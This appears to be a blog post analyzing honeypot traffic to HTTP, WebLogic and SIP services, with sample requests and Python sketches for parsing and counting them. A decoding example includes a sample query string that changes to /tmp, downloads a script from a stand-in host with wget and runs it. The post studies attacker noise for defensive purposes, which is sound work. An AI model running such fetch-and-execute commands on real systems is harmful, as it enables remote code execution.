A Look Into Honeypot Data

pew pew Norse map

I’ve been collecting data from honeypots for several years. During that time I never really did an in-depth analysis of the data. I do generate and publish high-level stats (published here), and every now and then I’ll casually browse the data and stumble onto some interesting payloads (one example). However, the data I’ve reported on and make available via API is focused on top targeted services and malicious IPs. While that high-level information has good value, there is much more data that can be used to produce additional metrics and extract useful information. To dive further into the data, I’ve started to apply additional parsing to payloads for various services. In this post, I’ll share data from HTTP, HTTP-Alt, WebLogic, and SIP services, and I plan to publish subsequent posts for other services.

A general note about the results: I still would not consider this an in-depth analysis. This is just an initial pass at the data, and even the scripts I wrote to extract it are relatively crude. The output is fairly raw, but I’ve replaced references to the destination IP addresses (the honeypot sensors) with x.x.x.x. Over time I’ll improve the extraction and analysis of the data.

Initial Parsing

As I mentioned, the focus in this post is on HTTP, HTTP-Alt, WebLogic, and SIP services (while SIP is not an HTTP protocol, SIP requests are very similar to HTTP requests). To keep it simple, I focused on the first line of the request payload, which, if well formed, contains four components: Method, Path (URL), Query String, and Protocol Version. Below are example requests; notice that the SIP request has basically the same structure as the HTTP request.

Example full HTTP request (HTTP-Alt & WebLogic are similar):

GET /test.php?query_parameter=test HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close

Example SIP payload:

INVITE sip:00442080503039@x.x.x.x:5060;transport=udp;user=phone SIP/2.0
Via: SIP/2.0/UDP 157.52.146.74:5060;branch=z9hG4bK-688856-1---swc2hkgz04oz8ezx;rport
Max-Forwards: 70
Contact: <sip:88894476642@157.52.146.74:5060;transport=udp>
To: <sip:00442080503039@x.x.x.x:5060;transport=udp;user=phone>
From: <sip:88894476642@157.52.146.74:5060;transport=udp;user=phone>;tag=iwfa2p8g
Call-ID: QRfsnfhUzcLwJnVz2fQeaW..
CSeq: 1 INVITE
Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, REFER, MESSAGE, OPTIONS, INFO, SUBSCRIBE
Content-Type: application/sdp
User-Agent: Alcatel-Lucent 5060 MGC-8 9.3.0.8
Allow-Events: presence, kpml, talk
Content-Length: 649

The Data

For each service, I generated a list of values for each of the four components. There is also a fifth list, malformed requests, which contains requests that did not parse cleanly because they were not properly formed. In most cases, this means there were extra spaces in the first line or fewer than the expected four components. These malformed requests appeared to be a result of fuzzing, injection payloads, encoded payloads, or scanners probing any port regardless of the intended service.
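
The split described above can be sketched roughly as follows. This is a minimal illustration, not the script used for this post: the function name `parse_first_line` is hypothetical, and it assumes a well-formed first line has exactly three space-separated tokens (method, request target, protocol version), with the target divided into path and query string at the first `?`.

```python
def parse_first_line(payload: str):
    """Split the first line of a request into (method, path, query, version).

    Returns None when the line does not have exactly three non-empty,
    space-separated tokens; such requests are treated here as malformed.
    """
    first_line = payload.splitlines()[0] if payload else ""
    tokens = first_line.split(" ")
    if len(tokens) != 3 or "" in tokens:
        return None  # extra spaces or missing components
    method, target, version = tokens
    # Everything after the first "?" is the query string (empty if absent).
    path, _, query = target.partition("?")
    return method, path, query, version


print(parse_first_line("GET /test.php?query_parameter=test HTTP/1.1\r\nHost: x.x.x.x:80"))
print(parse_first_line("GET  / HTTP/1.1"))  # double space: treated as malformed
```

With this approach a SIP request line parses the same way as an HTTP one, with the whole `sip:` URI landing in the path component and an empty query string.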

HTTP

This data consists of all requests to port 80 (HTTP) and port 443 (HTTPS).
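
For readers who want to build similar top 10 lists, here is a hedged sketch of grouping values by service and counting them. The port numbers come from this post (the other services' ports are given in their sections); the record layout of `(destination_port, value)` pairs and the names `SERVICE_BY_PORT` and `top_values` are assumptions made for illustration.

```python
from collections import Counter, defaultdict

# Port-to-service mapping as described in this post.
SERVICE_BY_PORT = {
    80: "HTTP",
    443: "HTTP",
    8080: "HTTP-Alt",
    7001: "WebLogic",
    5060: "SIP",
}


def top_values(records, n=10):
    """Count values per service and keep the n most common.

    records: iterable of (destination_port, value) pairs, where value is
    one parsed component such as the method or the path.
    Returns {service: [(value, count), ...]}.
    """
    counts = defaultdict(Counter)
    for port, value in records:
        service = SERVICE_BY_PORT.get(port)
        if service is not None:  # ignore ports outside this post's scope
            counts[service][value] += 1
    return {service: counter.most_common(n) for service, counter in counts.items()}
```

Calling `top_values` once per component (methods, paths, query strings, protocol versions) would give one ranked list per service and component.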

Method

Top 10 HTTP methods

See all HTTP method data here.

Path

Top 10 HTTP paths

The path is a good indicator of what application is being targeted. It’s clear that phpMyAdmin is highly targeted. As you review that data you’ll see many more targeted apps.

See all HTTP path data here.

Query String

Top 10 HTTP query strings

The empty value in row two represents requests where no query string was provided.

In row three, notice the parameter indicates an attempt to execute commands on the server. If executed, it would result in downloading and executing a script.
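
Query strings like this are often percent-encoded, so decoding them makes the intended command easier to read. Below is a small sketch using Python's standard `urllib.parse.parse_qsl`. The `sample` value is made up for illustration and is not taken from the honeypot data, and `decode_query` is a hypothetical helper name.

```python
from urllib.parse import parse_qsl


def decode_query(query: str):
    """Return the percent-decoded (name, value) pairs of a query string."""
    return parse_qsl(query, keep_blank_values=True)


# Hypothetical value for illustration only; not from the honeypot data.
sample = "cmd=cd%20/tmp%3Bwget%20http://example.invalid/a.sh%3Bsh%20a.sh"
for name, value in decode_query(sample):
    print(f"{name} = {value}")
```

Decoding only makes the payload readable; nothing in this sketch executes it.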

See all HTTP query string data here.

Protocol Version

Top 10 HTTP protocol versions

Note that rows seven and ten appear blank. My assumption is that at least one of them is not actually blank but contains a non-printable character.
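
One way to check an assumption like this is to print an escaped form of each value instead of the raw string. The sketch below is illustrative only; `reveal` and `looks_blank` are hypothetical helper names, and the inputs are examples rather than values from the data.

```python
def reveal(value: str) -> str:
    """Return the value with non-printable characters shown as escape sequences."""
    return value.encode("unicode_escape").decode("ascii")


def looks_blank(value: str) -> bool:
    """True when the value is non-empty yet shows nothing visible when printed."""
    has_visible = any(ch.isprintable() and not ch.isspace() for ch in value)
    return value != "" and not has_visible


for candidate in ["", "\x00", "HTTP/1.1"]:
    print(repr(candidate), looks_blank(candidate), reveal(candidate))
```

A value that is truly empty and one that holds a NUL byte or a stray carriage return look the same in a rendered table, but they are easy to tell apart once escaped.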

See all HTTP protocol versions data here.

Malformed Requests

Top 10 HTTP malformed requests

Note that each value is enclosed in [‘ ‘]. This is an artifact of the Python script I used to parse requests.
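
For context, brackets and quotes like these typically appear when a Python list is written out as a string rather than its elements. The snippet below shows that general behavior; it is an assumption about how such an artifact can arise, not a description of the actual script, and the function names are hypothetical.

```python
def as_logged(tokens):
    """Writing the list itself keeps the brackets and quotes."""
    return str(tokens)


def as_text(tokens):
    """Joining the elements yields only the original text."""
    return " ".join(tokens)


tokens = ["GET"]
print(as_logged(tokens))
print(as_text(tokens))
```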

The top ten are not so interesting. To find more interesting payloads, review all the malformed requests data via the link below.

See all HTTP malformed requests data here.

HTTP-Alt

This data consists of all requests to port 8080.

Method

Top 10 HTTP-Alt methods

See all HTTP-Alt method data here.

Path

Top 10 HTTP-Alt paths

See all HTTP-Alt path data here.

Query String

Top 10 HTTP-Alt query strings

See all HTTP-Alt query string data here.

Protocol Version

Top 10 HTTP-Alt protocol versions

See all HTTP-Alt protocol version data here.

Malformed Requests

Top 10 HTTP-Alt malformed requests

See all HTTP-Alt malformed requests data here.

WebLogic

This data consists of all requests to port 7001.

Method

Top WebLogic methods

See all WebLogic method data here.

Path

Top 10 WebLogic paths

See all WebLogic path data here.

Query String

Top WebLogic query strings

See all WebLogic query strings data here.

Protocol Version

Top WebLogic protocol versions

See all WebLogic protocol version data here.

Malformed Requests

Top 10 WebLogic malformed requests

See all WebLogic malformed requests data here.

SIP

This data consists of all requests to port 5060.

Method

Top 10 SIP methods

See all SIP method data here.

Path

Top 10 SIP paths

See all SIP path data here.

Query String

None

Protocol Version

Top SIP protocol versions

See all SIP protocol versions data here.

Malformed Requests

Top 10 SIP malformed requests

See all SIP malformed requests data here.

Conclusion

While there are no groundbreaking findings in this data, it does show some basic patterns of what to expect will hit your web applications or SIP (VoIP) services. In a sense, this establishes the normal noise. By continuing to monitor the expected noise, any new patterns (e.g. probes or attacks) will quickly stand out. Those new patterns should prove to be more interesting, as they may reveal new attack targets or exploits.
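
As a rough illustration of the baseline idea, the sketch below reports values that were never seen in an earlier baseline. The function name `new_patterns` and the sample paths are hypothetical; a real setup would probably also want counts and time windows.

```python
def new_patterns(baseline, observed):
    """Return values from observed that never appear in baseline.

    Each new value is reported once, in the order it was first seen.
    """
    known = set(baseline)
    reported = set()
    fresh = []
    for value in observed:
        if value not in known and value not in reported:
            reported.add(value)
            fresh.append(value)
    return fresh


# Hypothetical paths for illustration only.
baseline_paths = ["/", "/index.php"]
todays_paths = ["/", "/new-app/login", "/index.php", "/new-app/login"]
print(new_patterns(baseline_paths, todays_paths))
```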

Up Next

In future posts I’ll expand this analysis to the contents of HTTP POST requests. The content or body of POST requests will contain more interesting payloads. I’ll also expand analysis to services that are aligned with IoT. Stay tuned.

How Can I Do This?

If you are interested in running your own honeypot to capture data and perform your own analysis, I have a few tools for you. HoneyPy is a low to medium interaction honeypot that can be configured to report data into HoneyDB or several other destinations. An alternative to running HoneyPy is the HoneyDB Agent; more details on getting started are here.